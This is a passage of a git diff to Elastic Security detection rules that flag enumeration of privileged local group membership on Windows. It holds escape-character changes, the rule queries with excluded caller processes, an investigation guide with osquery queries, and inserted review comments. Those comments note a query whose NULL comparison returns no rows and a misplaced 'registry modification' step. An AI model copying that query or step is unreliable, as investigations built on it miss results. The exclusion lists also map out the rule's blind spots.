\"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { 
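Review bot: In the new `note` value, the osquery query labelled "Osquery - Retrieve Services Running on User Accounts" ends its WHERE clause with `user_account == null`; osquery evaluates SQL through SQLite, where a comparison against NULL yields NULL rather than true or false, so `NOT (... OR user_account == null)` is never true and the query returns no rows on any host an analyst runs it from. Writing `user_account IS NULL` in that clause gives the intended exclusion. Separately, the investigation step `searching for login events (for example, 4624) to the target host after the registry modification` appears to be carried over from a registry-focused guide, since this rule fires on group-membership enumeration; `after the enumeration event` would describe the correct pivot. Both strings recur in the _108 file section below and in the section that ends above this hunk.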
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4",
- "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json
index 8791a4723f5..92bdd541251 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. 
Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, 
start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { 
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4",
- "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
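Review bot: The rewritten `setup` string on the `+` line still carries the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; since this line is already being rewritten for the `\u003e` → `>` escape change, dropping the extra `with` here costs nothing and the parsed value is otherwise unchanged. The same sentence recurs in the `setup` hunk at `@@ -70,7 +70,7 @@` and in the tail of the `note` hunk at `@@ -19,7 +19,7 @@` of the `_208` file, so the correction should be applied in all three places. The enclosing JSON object starts and ends outside this hunk.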
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json
index 1b02d63f0c3..5eb28b17b4d 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json
@@ -19,7 +19,7 @@ "winlog.event_data.SubjectUserName", "winlog.event_data.CallerProcessName" ], - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. 
Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, 
start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (winlog.event_data.SubjectUserName: (*$ or \"LOCAL SERVICE\" or \"NETWORK SERVICE\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n 
*\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n 